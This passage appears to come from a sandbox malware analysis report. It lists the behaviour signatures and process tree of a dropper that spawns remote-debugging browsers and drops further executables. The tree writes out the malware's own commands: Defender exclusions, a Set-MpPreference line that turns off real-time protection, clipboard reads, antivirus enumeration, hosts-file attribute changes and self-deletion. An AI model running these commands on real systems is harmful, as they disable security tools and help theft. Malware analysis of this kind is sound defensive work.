SeProfSingleProcessPrivilege 5456 WMIC.exe Token: SeIncBasePriorityPrivilege 5456 WMIC.exe Token: SeCreatePagefilePrivilege 5456 WMIC.exe Token: SeBackupPrivilege 5456 WMIC.exe Token: SeRestorePrivilege 5456 WMIC.exe Token: SeShutdownPrivilege 5456 WMIC.exe Token: SeDebugPrivilege 5456 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 3904 183faf97c2.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 64 firefox.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3904 183faf97c2.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4428 H3tyh96.exe 64 firefox.exe 4960 9feskIx.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2256 wrote to memory of 3928 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 83 PID 2256 wrote to memory of 3928 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 83 PID 3928 wrote to memory of 4408 3928 chrome.exe 84 PID 3928 wrote to memory of 4408 3928 chrome.exe 84 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 3288 3928 chrome.exe 86 PID 3928 wrote to memory of 2300 3928 chrome.exe 87 PID 3928 wrote to memory of 2300 3928 chrome.exe 87 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 PID 3928 wrote to memory of 4152 3928 chrome.exe 88 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 6060 attrib.exe 3184 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe"C:\Users\Admin\AppData\Local\Temp\2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8bd49cc40,0x7ff8bd49cc4c,0x7ff8bd49cc583⤵PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1952 /prefetch:23⤵PID:3288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1896,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2200 /prefetch:33⤵PID:2300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2500 /prefetch:83⤵PID:4152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:13⤵
- Uses browser remote debugging
PID:3060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:13⤵
- Uses browser remote debugging
PID:2356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3648,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:13⤵
- Uses browser remote debugging
PID:4392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4836,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3804 /prefetch:83⤵PID:1364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4872 /prefetch:83⤵PID:4384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4852 /prefetch:83⤵PID:336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3804 /prefetch:83⤵PID:4464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:83⤵PID:1288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4896,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:83⤵PID:3428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4856,i,4807812434194727191,2200601073896511218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5308 /prefetch:23⤵
- Uses browser remote debugging
PID:4796
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1544 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8cc0346f8,0x7ff8cc034708,0x7ff8cc0347183⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,16125168614158187228,2049113075048040513,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:23⤵PID:1660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,16125168614158187228,2049113075048040513,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,16125168614158187228,2049113075048040513,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:83⤵PID:1732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2032,16125168614158187228,2049113075048040513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:13⤵
- Uses browser remote debugging
PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2032,16125168614158187228,2049113075048040513,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:13⤵
- Uses browser remote debugging
PID:1152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2032,16125168614158187228,2049113075048040513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:13⤵
- Uses browser remote debugging
PID:372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2032,16125168614158187228,2049113075048040513,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:13⤵
- Uses browser remote debugging
PID:3856
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\EBKKKEGIDB.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2092 -
C:\Users\Admin\Documents\EBKKKEGIDB.exe"C:\Users\Admin\Documents\EBKKKEGIDB.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:412 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2168 -
C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe"C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe"5⤵
- Executes dropped EXE
PID:2880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 2246⤵
- Program crash
PID:2788
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe"C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe" & rd /s /q "C:\ProgramData\GLXT0HV3OP8Y" & exit6⤵
- System Location Discovery: System Language Discovery
PID:4172 -
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013829001\9feskIx.exe"C:\Users\Admin\AppData\Local\Temp\1013829001\9feskIx.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\rmqmtw.exe"C:\Users\Admin\AppData\Local\Temp\rmqmtw.exe"6⤵
- Executes dropped EXE
PID:6136 -
C:\Users\Admin\AppData\Local\Temp\rmqmtw.exe"C:\Users\Admin\AppData\Local\Temp\rmqmtw.exe"7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:6092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rmqmtw.exe'"8⤵PID:5408
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rmqmtw.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"8⤵PID:5484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵PID:5712
-
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵PID:5792
-
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"8⤵PID:5840
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"8⤵
- Clipboard Data
PID:2972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard9⤵
- Clipboard Data
- Suspicious use of AdjustPrivilegeToken
PID:5128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵PID:1680
-
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:4172
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"8⤵PID:536
-
C:\Windows\system32\systeminfo.exesysteminfo9⤵
- Gathers system information
PID:5732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"8⤵PID:4908
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath9⤵PID:2436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"8⤵PID:5760
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts9⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:916
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:1508
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"8⤵PID:548
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts9⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:5884
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:5136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵PID:5760
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:4908
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
PID:1300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:6108
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:5516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:5128
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:5444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 64"8⤵PID:1740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:972
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 649⤵
- Kills process with taskkill
PID:5584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1764"8⤵PID:5808
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17649⤵
- Kills process with taskkill
PID:5496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3848"8⤵PID:5444
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 38489⤵
- Kills process with taskkill
PID:4944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1612"8⤵PID:6132
-
